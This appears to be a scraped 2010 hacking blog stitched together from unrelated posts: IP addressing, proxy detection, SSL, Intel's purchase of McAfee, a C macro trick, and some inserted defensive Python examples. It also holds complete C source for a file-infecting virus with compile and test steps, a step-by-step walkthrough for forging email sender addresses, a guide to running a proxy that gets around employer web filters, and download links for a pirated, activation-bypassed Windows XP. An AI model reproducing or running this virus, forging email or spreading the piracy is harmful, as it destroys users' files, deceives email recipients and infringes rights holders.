Saturday, August 28, 2010

What are Private and Public IP Addresses


Internet Protocol (IP) addresses are usually of two types: public and private. If you have ever wondered what the difference between a public and a private IP address is, you are at the right place. In this post I will try to explain the difference between a public and a private IP address in layman’s terms so that it becomes simple and easy to understand.
 

What are Public IP Addresses?

A public IP address is assigned to every computer that connects to the Internet, and each one is unique. Hence no two computers anywhere on the Internet can have the same public IP address. This addressing scheme makes it possible for computers to “find each other” online and exchange information. The user has no control over the public IP address that is assigned to the computer. It is assigned by the Internet Service Provider as soon as the computer is connected to the Internet gateway.
A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. A dynamic public IP address, on the other hand, is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer, which is released when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.
You can check your public IP address by visiting www.whatismyip.com
 

What are Private IP Addresses?

An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):
10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)
172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)
192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)

Private IP addresses are used for numbering the computers in a private network, including home, school and business LANs and the LANs in airports and hotels, which makes it possible for the computers in the network to communicate with each other. For example, if a network X consists of 10 computers, each of them can be given an IP from 192.168.1.1 to 192.168.1.10. Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).
Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.
If the private network is connected to the Internet (through an Internet connection via an ISP) then each computer will have a private IP as well as a public IP. The private IP is used for communication within the network, whereas the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private and a public IP.
You can find your private IP by typing the ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP, which in most cases will be 192.168.1.1 or 192.168.1.2. Unlike the public IP, private IP addresses are always static in nature.
Unlike what most people assume, a private IP is neither one which is impossible to trace (just like a private telephone number) nor one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace, since the protocol itself is designed for transparency.
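The three reserved blocks listed above, checked in code. This is an added example, not part of the original post; the function names and sample addresses are constructed for illustration. It writes the blocks in CIDR notation, confirms the address totals given above, and shows the boundary cases that are easy to get wrong (172.32.x.x and 192.169.x.x are not private, and 127.0.0.1 is loopback rather than one of the three blocks).

```python
import ipaddress

# The three private blocks from the list above, in CIDR notation.
# Python's own ip.is_private is deliberately not used: it also returns True for
# loopback, link-local and documentation ranges, which are not in this list.
PRIVATE_BLOCKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def block_summary():
    """Return (first address, last address, total addresses) for each block."""
    return [(str(net[0]), str(net[-1]), net.num_addresses) for net in PRIVATE_BLOCKS]


def private_block(addr):
    """Return the reserved block containing addr, or None if it is in none of them."""
    ip = ipaddress.ip_address(addr)
    for net in PRIVATE_BLOCKS:
        if ip in net:
            return net
    return None


def classify(addr):
    """Label an address as private, loopback, link-local or outside the private blocks."""
    ip = ipaddress.ip_address(addr)
    net = private_block(addr)
    if net is not None:
        return "private (%s)" % net
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    return "outside the private blocks"


if __name__ == "__main__":
    for first, last, total in block_summary():
        print("%-12s - %-16s %10d addresses" % (first, last, total))
    # Constructed sample addresses, chosen to sit on the block boundaries.
    for sample in ["10.1.2.3", "172.15.255.255", "172.16.0.0", "172.31.255.255",
                   "172.32.0.0", "192.168.1.2", "192.169.0.1", "127.0.0.1",
                   "169.254.10.20"]:
        print("%-16s %s" % (sample, classify(sample)))
```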

How to Detect Anonymous IP Addresses


As fraudsters are becoming more sophisticated in bypassing Geo-location controls by using proxies (anonymous IPs) to spoof their IP address, it has become necessary to come up with a means of detecting proxies so that the authenticity of users can be verified. Using a proxy (web proxy) is the simplest and easiest way to conceal the IP address of an Internet user and maintain online privacy. However, proxies are more widely used by online fraudsters to engage in cyber crimes, since it is the easiest way to hide their actual Geo-location, such as city/country, through a spoofed IP address. Following are some examples where fraudsters use proxies to hide their actual IP.
 
1. Credit Card Frauds
For example, say a Nigerian fraudster tries to purchase goods online with a stolen credit card for which the billing address is associated with New York. Most credit card merchants use Geo-location to block orders from countries like Nigeria and other high risk countries. So in order to bypass this restriction the credit card fraudster uses a proxy to spoof his IP address so that it appears to have come from New York. The IP address location appears to be legitimate since it is in the same city as the billing address. A proxy check would be needed to flag this order.
 
2. Bypass Website Country Restrictions
Some website services are restricted to users from only a selected list of countries. For example, a paid survey may be restricted to countries like the United States and Canada. So a user from, say, China may use a proxy to make his IP appear to have come from the U.S. so that he can earn from participating in the paid survey.
 

Proxy Detection Services

 
So in order to stop such online frauds, Proxy Detection has become a critical component. Today most companies, credit card merchants and websites that deal with e-commerce transactions make use of Proxy Detection Services like MaxMind and FraudLabs to detect the usage of proxy or spoofed IP from users participating online.
Proxy Detection web services allow instant detection of anonymous IP addresses. Even though the use of proxy address by users is not a direct indication of fraudulent behaviour, it can often indicate the intention of the user to hide his or her real IP. In fact, some of the most used ISPs like AOL and MSN are forms of proxies and are used by both good and bad consumers.
 
How Proxy Detection Works?
Proxy detection services often rely on IP addresses to determine whether or not the IP is a proxy. Merchants can obtain the IP address of the users from the HTTP header on the order that comes into their website. This IP address is sent to the proxy detecting service in real time to confirm its authenticity.
The proxy detection services on the other hand compare this IP against a known list of flagged IPs that belong to proxy services. If the IP is not on the list then it is authenticated and the confirmation is sent back to the merchant. Otherwise it is reported to be a suspected proxy. These proxy detection services work continuously to grab a list or range of IPs that are commonly used for proxy services. With this it is possible to tell whether or not a given IP address is a proxy or spoofed IP.
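The list comparison described above, sketched from the merchant's side as an added example (not code from MaxMind, FraudLabs or this blog). The flagged ranges, order fields and function names are constructed for illustration. The source address is taken from the connection itself, and proxy-revealing headers are only a signal, since the client controls them; a hit leads to review rather than rejection, because proxy use alone does not prove fraud.

```python
import ipaddress

# Constructed flagged ranges (RFC 5737 documentation space), standing in for
# the list of known proxy IPs that a detection service maintains.
FLAGGED = [
    (ipaddress.ip_network("203.0.113.0/24"), "anonymous web proxy"),
    (ipaddress.ip_network("198.51.100.64/26"), "open HTTP proxy"),
]

# Headers that forwarding proxies commonly add. Their presence is a hint only.
PROXY_HEADERS = ("via", "x-forwarded-for", "forwarded")


def flagged_label(ip_text):
    """Service side: label of the flagged range containing the IP, else None.

    Raises ValueError if ip_text is not a valid IP address.
    """
    ip = ipaddress.ip_address(ip_text)
    for net, label in FLAGGED:
        if ip in net:
            return label
    return None


def screen_order(order):
    """Merchant side: decide whether an incoming order needs manual review."""
    reasons = []
    try:
        label = flagged_label(order["remote_addr"])
    except ValueError:
        return {"decision": "review", "reasons": ["source address does not parse"]}
    if label:
        reasons.append("source IP is in a flagged range: " + label)

    headers = {name.lower(): value for name, value in order.get("headers", {}).items()}
    seen = [name for name in PROXY_HEADERS if name in headers]
    if seen:
        reasons.append("proxy headers present: " + ", ".join(seen))

    ip_country = order.get("ip_country")
    billing_country = order.get("billing_country")
    if ip_country and billing_country and ip_country != billing_country:
        reasons.append("IP country %s differs from billing country %s"
                       % (ip_country, billing_country))

    return {"decision": "review" if reasons else "accept", "reasons": reasons}


# Constructed sample orders. A1 is the credit card case from this post: the IP
# geolocates to the billing country, so only the proxy check catches it.
ORDERS = [
    {"id": "A1", "remote_addr": "203.0.113.45", "headers": {},
     "ip_country": "US", "billing_country": "US"},
    {"id": "A2", "remote_addr": "192.0.2.10", "headers": {"Via": "1.1 cache.example"},
     "ip_country": "US", "billing_country": "US"},
    {"id": "A3", "remote_addr": "192.0.2.77", "headers": {},
     "ip_country": "US", "billing_country": "US"},
    {"id": "A4", "remote_addr": "192.0.2.90", "headers": {},
     "ip_country": "CA", "billing_country": "US"},
]

if __name__ == "__main__":
    for order in ORDERS:
        result = screen_order(order)
        print(order["id"], result["decision"], result["reasons"])
```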
 
How to Tell Whether a given IP is Real or a Proxy?
There are a few free sites that help you determine whether or not a given IP is a proxy. You can use free services like WhatisMyIPAddress to detect proxy IPs. Just enter the suspected IP in the field and click on “Lookup IP Address” button to check the IP address. If it is a suspected proxy then you will see the results something as follows.
So for all those who think that they can escape by using a spoofed IP, this post is the answer. I hope this information helps. Pass your comments.

XSSer Storm - Open Source Penetration testing tool

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports these new features:
-g DORK               Process search engine dork results as target urls (ex: inurl:vulnerable.asp?id=)
--Ge=DORK_ENGINE      Search engine to use for dorking (scroogle, duck, altavista, bing)
-c CRAWLING           Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH   Number of urls to visit when crawling
--Dfo                 Encodes fuzzing IP addresses in DWORD format

Download: http://xsser.sourceforge.net

Know More About Secure Sockets Layer (SSL)


Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.
 

What exactly is Secure Communication ?

 
Suppose there exist two communicating parties A (client) and B (server).
 
Working of HTTP
When A sends a message to B, the message is sent as plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as plain text. This is a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B, he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
 
Now let’s see the working of HTTPS
When A sends a PASSWORD (say “mypass”) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B’s side. So even if the hacker gains unauthorised access to the ongoing communication between A and B, he gets only the encrypted password (“xz54p6kd”) and not the original password. This is shown below
 

How is HTTPS implemented ?

 
HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
  1. An SSL Certificate enables encryption of sensitive information during online transactions.
  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
 
How Encryption Works ?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to everyone, but the private key (used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key (Secret key).
 
How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.
I Hope this helps. Please pass your comments.

Intel to buy McAfee

Intel to buy McAfee for $7.68 billion


Intel plans to buy security company McAfee for $7.68 billion--the biggest acquisition in its 42-year history.
The chipmaker said Thursday it has entered into a definitive agreement to buy all of McAfee's common stock at $48 per share in cash. McAfee's stock closed Wednesday at $29.93, making Intel's offer a 60 percent premium.
The boards of both companies have approved the deal.
Security has become an essential element of online computing, on par with energy-efficient performance and connectivity, Intel said. But today's security isn't adequately addressing the array of new Net-connected machines on the market, such as mobile devices, TVs, cars, ATMs, and medical gadgets, according to Intel. Offering protection requires a new approach that can tie together software, hardware, and services, the company said.
"With the rapid expansion of growth across a vast array of Internet-connected devices, more and more of the elements of our lives have moved online," Intel CEO Paul Otellini said in a statement. "In the past, energy-efficient performance and connectivity have defined computing requirements. Looking forward, security will join those as a third pillar of what people demand from all computing experiences."
By integrating McAfee's core technology, Intel asserts that it can improve current products and offer new ones that can better secure both the cloud and devices used by consumers and businesses. Those include traditional computers and embedded products--any device where chips play a prominent role.
"Our view is that everywhere we sell a microprocessor, there is an opportunity to sell security software with it," Otellini said in a conference call.
The chipmaker also sees the acquisition as augmenting its wireless strategy.
"Hardware-enhanced security will lead to breakthroughs in effectively countering the increasingly sophisticated threats of today and tomorrow," Renee James, Intel senior vice president, said in a statement. "This acquisition is consistent with our software and services strategy to deliver an outstanding computing experience in fast-growing business areas, especially around the move to wireless mobility."
The number of connected devices is expected to grow from around 1 billion today to 50 billion in another 10 years, according to McAfee CEO Dave DeWalt. This growth will reshape opportunities in communications and commerce, he said in a video presentation, but cybercriminals and cyberterrorists will also take advantage of the Net's open architecture, putting users at risk and jeopardizing the future of the Internet. Tackling next-generation cybersecurity is a key reason and motivation for Intel and McAfee to join forces, DeWalt said.
The merger stems in part from projects that Intel and McAfee have already been working on together. The two companies have been collaborating for the past 18 months on ways to improve security, James noted in the conference call.
"After working alongside each other and recognizing that we share a common vision for improving security, it made good sense that we take this step," James said.
The first product resulting from the team-up will be released in early 2011, James said, though she didn't reveal any details.
The deal also continues Intel's strategy of growing its business by using software to enhance its hardware, added James, citing the company's 2009 acquisition of Wind River Systems as just one example.
The deal is expected to close following McAfee shareholder approval and regulatory clearances, which Intel is hoping will occur before year's end. Once the acquisition is finalized, McAfee will operate as a wholly owned subsidiary, tied to Intel's Software and Services Group.
Intel noted the McAfee management team has promised to stay on for many years after the acquisition closes. Intel also said it's committed to the McAfee brand and all McAfee products.
In initial trading Thursday, McAfee stock was surging toward Intel's offer price, up about 57 percent to around $47.16, while Intel's own shares were trending down about 3 percent to the vicinity of $18.90. Intel said it expects the integration of McAfee to slightly dilute earnings during the first year of combined operations due to merger-related costs but then have little effect in the second year.
Although Intel is paying a 60 percent premium for McAfee over the stock's closing price from Wednesday, Intel noted the premium is in the range of recent large software and security transactions and is reasonable given McAfee's growth and profitability and the added value that Intel and McAfee can create together.
The Intel acquisition of McAfee illustrates the trend of security proliferating through all the layers of technology, said IDC analyst Chris Christiansen.
"I think this is a dramatic acceleration in the previous trend of security going from boxes to board to chips," he said. "Intel can bring economies of scale and advanced chip management to McAfee, and McAfee has technology in messaging, Web, encryption and DLP, areas that Intel can use in a variety of ways. It represents a shift in the security market of security into systems, chip and storage management and other disciplines."
The news also makes Christiansen wonder whether Symantec might not be next as an acquisition target.
"We are going to see more and more security companies absorbed into system management," he said, noting that "Microsoft consolidated security into its system management division."
The McAfee acquisition fits nicely with Intel's purchase last year of Wind River, McAfee Chief Technology Officer George Kurtz noted. Intel bought the maker of embedded-systems software for $884 million.
"Given the current challenges in dealing with the proliferation of virulent malware, bringing software closer to silicon will provide a real advantage for consumers and businesses. Beating back the tide of malware proliferation by changing the game on the bad guys is an exciting proposition," Kurtz said in a blog post.
"McAfee's strategy of protecting the multitude of devices such as ATMs, printers, digital copiers, and cars fits with helping organizations better manage and protect the IP enabled mobile and embedded devices that run Wind River embedded and mobile software," Kurtz said. "This also dovetails nicely with McAfee's acquisition of Solidcore, a leader in dynamic whitelisting technology that already provides protection for millions of embedded devices."
Intel had already announced an acquisition this week, saying it plans to buy Texas Instruments' cable modem unit to broaden the markets for its Atom processor line.
Here is a video from Intel about the McAfee acquisition:

Create your own Proxy Server instantly


Hello Friends,
Did I tell you I got a job at a very well-known company in India? (I cannot reveal the name, since if I tell you I will be violating the rules of that company.) Well, it is one of the reasons for the reduced frequency of my posts on the latest hacking stuff. I had quite a lot of trouble in the last few weeks with a company’s browsing restrictions. It used an extensive directory of ‘forbidden websites’ that kept out all but a few popular sites. In effect, no games sites, no personal email, and no Hacking Truths. But don’t worry, I have found a way to break free.
None of the conventional proxy servers worked, and even Google Translate failed. My hopes were down until, yesterday, I discovered that one of my personal domains could be accessed.
Back on my home computer, in a matter of minutes, I had set up my own functioning proxy server. With the instructions below, so can you.

Prerequisites

If we want to pull this off there are a few things you need.
In theory, any webhost will do, if they comply with the other requirements; an old computer in your basement, or even a free online webhost.
  • PHP5 or greater and cURL
Look for this on the website of your webhost. If it’s paid hosting, you can almost count on it. Especially cURL is a feature that’ll be disabled on most free webservers.
  • Permission
That’s right. Some webhosts will explicitly forbid you to create a proxy server (or a chat room, for that matter) in their terms of content. And you can expect them to find out.

1. Download and Install GlypeProxy

GlypeProxy is a free, standalone PHP script. That means it’s lightweight and incredibly easy to configure. You can download it from their website.
Next, upload the files to a sub directory on your webserver. If you see a folder called ‘www’, or named after your domain name (e.g. domain.com), create the sub folder in there. You need to avoid using the word ‘proxy’, because some companies pick up on it. Instead, use ‘web’ or ‘surf’.
There are a few different ways to upload your files. If you already know this, skip to the next paragraph. Here they are arranged from the least to the most effort.
  • Upload and unpack ZIP
Look in the filemanager for an ‘unpack’ or ‘extract’ option. You can then upload it in one take. This is not always supported.
  • FTP access
Use an FTP application to access your webhost, and let it transfer the files while you fetch some more coffee. Most often supported.
  • Manual upload
You really don’t want to do this – are you sure the previous two alternatives are blanked out? Your last resolve will be to manually upload all the files and folder structures. Or start looking for a different host – it might not be such a bad idea.

2. Ready For Use

There’s no real set-up needed. Just point your browser to the directory where you put all those files (ex. domain.com/surf) and GlypeProxy will pop up. If you don’t like the logo, you’ll have to replace it manually. But if you want a proxy server for personal use, some little branding won’t matter.
Users can enter any URL and, after expanding the options, choose to encode the URL, the page, allow cookies, scripts and objects. Encoding the page can help you access some sites that are still being picked up and intercepted, but might give you a corrupt webpage at times.

3. Admin Preferences

Although Glype is a powerful proxy script, the admin tools are obviously the backing power. You might not know this, but a lot of online proxy tools are powered by Glype, just like the one you just set up. The admin preferences leave room not only for customization, but for improvement. You can assign site-specific code for trouble-giving websites, and change user-agent and proxy lists.
Most useful to novice users will be the caching tools (pictured above), logs, and blacklists. The caching tools can help you improve the browsing speed by storing some files from all, or some of the already visited websites. Logs are off by default, but might have legal importance in the future, depending on who uses your proxy server. Always explicitly mention you’re keeping these logs. Finally, the blacklists will allow you to block (all but) a few sites, or users.
To access your admin panel, point your browser to admin.php on your webserver (e.g. domain.com/surf/admin.php).

Download Microsoft® Windows XP SP3 Corporate Student Edition August 2010

You do not need to use cracks and stuff; install and use it if you have a licensed copy. This is a so-called "student" copy of XP. It is used for educational purposes and is therefore designed for multiple installations without further contact with the Windows Genuine Advantage blacklist. This version of Windows XP SP3 does not require activation and passes Microsoft's official validation.

System Features:
- No need for any wga cracks with this one it passes online as fully Genuine.
- UXTheme applied,tcp ip = 16777215.
- All hotfixes integrated upto date August 2010.
- The new cd-key is slipstreamed into the CD so no need to put when installing.
- Default windows language ENGLISH/UK (Please change to your own language when installing).

Added Drivers:
- Driverpacks base 10.06
- MassStorage 10.06 txt mode (sata + raid)

Added Programs:
Framework all in one 1.1 - 4.0
Internet explorer 8
Windows media player 11
Directx 9 June 2010
Lclock 1.62b
Flash 10.1.82.76
Shockwave 11.5.7.609
Java 6 update 21
Foxit Reader 4.1.1
Winrar 3.93 regged
Firefox 4.0b1 (new)
Vlc media player 1.1.2 (new)
Kels runtimes 6.8.2
c++ 2005
c++ 2008
c++ 2010
Msn.Live.Messenger.9.0.14.0.8117.416 web-setup on desktop

REMOVED:
Music Samples
MSN Explorer
Windows Messenger 4.7
Tour
Folders: SUPPORT,VALUEADD,DOCS,WIN9XMIG,WIN9XUPG,WINNTUPG

How To Use:
Burn the image using the software you like.
CD is bootable.
Install as you would an original CD.

Download:


FileServe:

http://www.fileserve.com/file/7HjDDCU
http://www.fileserve.com/file/Y6DNV3f
http://www.fileserve.com/file/a6HUuxN
http://www.fileserve.com/file/HC3j4Qw

Send Fake Email – Fake Email Pranks

Most of the email forging tutorials on the Internet teach how to send fake email by connecting to the SMTP server of the ISP or some other domain. These hacks no longer work today, because the SMTP server of a remote host will reject any attempt at unauthorised access. Many websites also offer to send fake email from their sites, but none of them work. So we have to run our own SMTP server on our computer to successfully send a fake email. An SMTP server is a simple software program which can be installed on your computer in a few seconds. It allows you to send fake email right from your desktop easily and effectively. Download QK SMTP server here: http://www.qksoft.com/qk-smtp-server/. This is the SMTP server I am using in my tutorial. Once you download and install the server on your computer, you are all set to send fake email successfully.
 
 
PART A: CONFIGURING SMTP SERVER
Once you have installed the QK SMTP server on your comp you must perform the following configuration.
1. Click on “Settings” button on the main screen,the Settings window pops up
2. On Settings window click on “Basic Parameter” tab
3. Set binding IP to “127.0.0.1″
4. Set port to “25″
 
PART B: SENDING FAKE EMAIL (EMAIL FORGING)
1. Click on SMTP server icon on your desktop to start your SMTP server to run(The icon is shown on the notification area of the taskbar if it is running). If it is already running then this step can be ignored
2. Goto command prompt(Start-Accessories-Command prompt)
3. Type exactly as follows
C:\>telnet 127.0.0.1 25
Here 127.0.0.1 is the default IP of every computer and 25 is the port number. So you are connecting to the SMTP server running on your own computer. This step is very important to send fake email.
NOTE: The IP 127.0.0.1 should not be substituted by any other IP.
4. After typing the telnet command in the command prompt you get entry to the server, which displays the following message. The response of a QK SMTP server is given below. The text in parentheses is only explanation.
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake email appears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Sat Jan 5,2008 9:45 PM
Subject:Test to send fake email
You can create as many headers as you like, each followed by the “:” symbol.
NOTE: HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS BODY OF THE EMAIL. Press enter twice so that there is a line gap between the header & body data
<HERE IS YOUR DATA>
End the body of email by pressing [ENTER] .(dot) [ENTER]
250 Mail queued for delivery (Server indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)

*****END OF EMAIL FORGING*****
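How a message like the one in the session above looks to the receiving side, as an added example that is not part of the original tutorial. Both messages are constructed; mx.recipient.example is an assumed name for the recipient's own mail server, which records SPF/DKIM/DMARC verdicts in an Authentication-Results header (RFC 8601). The check trusts only the header stamped by that server, because the sender can type any header, including a fake verdict, into the DATA section.

```python
import re
from email import message_from_string
from email.utils import parseaddr

TRUSTED_AUTHSERV = "mx.recipient.example"  # assumption: the recipient's own MTA

# Constructed message as stored by the recipient's server. The last
# Authentication-Results header is sender-supplied and must be ignored.
FORGED = """\
Return-Path: <billg@microsoft.com>
Received: from hacker (unknown [192.0.2.25])
\tby mx.recipient.example with SMTP; Sat, 28 Aug 2010 10:00:00 +0000
Authentication-Results: mx.recipient.example; spf=fail smtp.mailfrom=microsoft.com;
\tdkim=none; dmarc=fail header.from=microsoft.com
Authentication-Results: mail.sender.example; spf=pass
From: Gates <billg@microsoft.com>
To: admin@gmail.com
Subject: Test to send fake email

<HERE IS YOUR DATA>
"""

# Constructed legitimate message for comparison.
LEGIT = """\
Return-Path: <news@example.org>
Received: from mail.example.org (mail.example.org [198.51.100.7])
\tby mx.recipient.example with ESMTPS; Sat, 28 Aug 2010 10:05:00 +0000
Authentication-Results: mx.recipient.example; spf=pass smtp.mailfrom=example.org;
\tdkim=pass header.d=example.org; dmarc=pass header.from=example.org
From: News <news@example.org>
To: admin@gmail.com
Subject: Monthly newsletter

Hello.
"""


def domain_of(header_value):
    """Domain part of the address in a From or Return-Path header."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def trusted_auth_results(msg):
    """Verdicts per method, taken only from headers our own server added."""
    results = {}
    for value in msg.get_all("Authentication-Results", []):
        authserv, _, rest = value.partition(";")
        if authserv.strip().lower() != TRUSTED_AUTHSERV:
            continue  # written by someone else, possibly the sender
        for method, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", rest, re.I):
            results.setdefault(method.lower(), verdict.lower())
    return results


def helo_name(msg):
    """Name the client gave in HELO, from the topmost Received header."""
    received = msg.get_all("Received", [])
    match = re.match(r"\s*from\s+(\S+)", received[0]) if received else None
    return match.group(1) if match else None


def analyse(raw):
    msg = message_from_string(raw)
    from_domain = domain_of(msg.get("From"))
    path_domain = domain_of(msg.get("Return-Path"))
    auth = trusted_auth_results(msg)
    findings = []
    for method in ("spf", "dkim", "dmarc"):
        verdict = auth.get(method, "none")
        if verdict != "pass":
            findings.append("%s=%s for %s" % (method, verdict, from_domain))
    helo = helo_name(msg)
    if helo and "." not in helo and not helo.startswith("["):
        findings.append("HELO name '%s' is not a fully qualified host name" % helo)
    if path_domain and path_domain != from_domain:
        findings.append("envelope sender domain differs from From domain")
    return {"from_domain": from_domain, "auth": auth,
            "suspicious": auth.get("dmarc") != "pass", "findings": findings}


if __name__ == "__main__":
    for name, raw in (("forged", FORGED), ("legit", LEGIT)):
        print(name, analyse(raw))
```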
 

C Program Without a Main Function

How do you write a C program without a main function? Is it possible to do that? Yes, there can be a C program without a main function. Here’s the code of the program without a main function…

 
#include <stdio.h>
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()   /* the preprocessor turns "begin" into "main" */
{
    printf(" hello ");
    return 0;
}
 
Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function. But how, what’s the logic behind it? How can we have a C program working without main?
Here we are using the preprocessor directive #define with arguments to give the impression that the program runs without main. But in reality it runs with a hidden main function.
The ‘##’ operator is called the token pasting or token merging operator. That is, we can merge two or more characters with it.
NOTE: A preprocessor is a program which processes the source code before compilation.
 
Look at the 2nd line of program -
#define decode(s,t,u,m,p,e,d) m##s##u##t
 
What is the preprocessor doing here? The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (the ## operator merges m, s, u & t into msut). The logic is that when you pass (s,t,u,m,p,e,d) as arguments, it merges the 4th, 1st, 3rd & 2nd characters (tokens).
 
Now look at the third line of the program -
#define begin decode(a,n,i,m,a,t,e)
 
Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e). According to the macro definition in the previous line, the arguments must be expanded so that the 4th, 1st, 3rd & 2nd characters are merged. In the arguments (a,n,i,m,a,t,e) the 4th, 1st, 3rd & 2nd characters are ‘m’, ‘a’, ‘i’ & ‘n’.
So “int begin” is replaced by “int main” by the preprocessor before the program is passed on to the compiler. That’s it…
The bottom line is there can never exist a C program without a main function. Here we are just playing a gimmick that makes us believe the program runs without a main function, but actually there exists a hidden main function in the program. Here we are using the preprocessor directive to intelligently replace the word “begin” by “main”. In simple words, int begin = int main.

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9, THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDING YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
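From the defender's side, the behaviour described above leaves a clear trace: every file the program touched starts with the same bytes, and documents or images now begin with an executable header. The check below is an added example, not code from the original post; the 2048-byte block mirrors the buffer size in the listing, and the function names and sample files are constructed for illustration.

```python
import hashlib
import os
from collections import defaultdict

BLOCK = 2048  # same size as buff[] in the listing above
EXECUTABLE_EXTS = {".exe", ".dll", ".com", ".sys", ".scr", ".ocx"}


def load_directory(path, block=BLOCK):
    """Read the first `block` bytes of every regular file in `path`."""
    heads = {}
    for entry in os.scandir(path):
        if entry.is_file(follow_symlinks=False):
            with open(entry.path, "rb") as fh:
                heads[entry.name] = fh.read(block)
    return heads


def shared_prefix_groups(heads, block=BLOCK, min_group=3):
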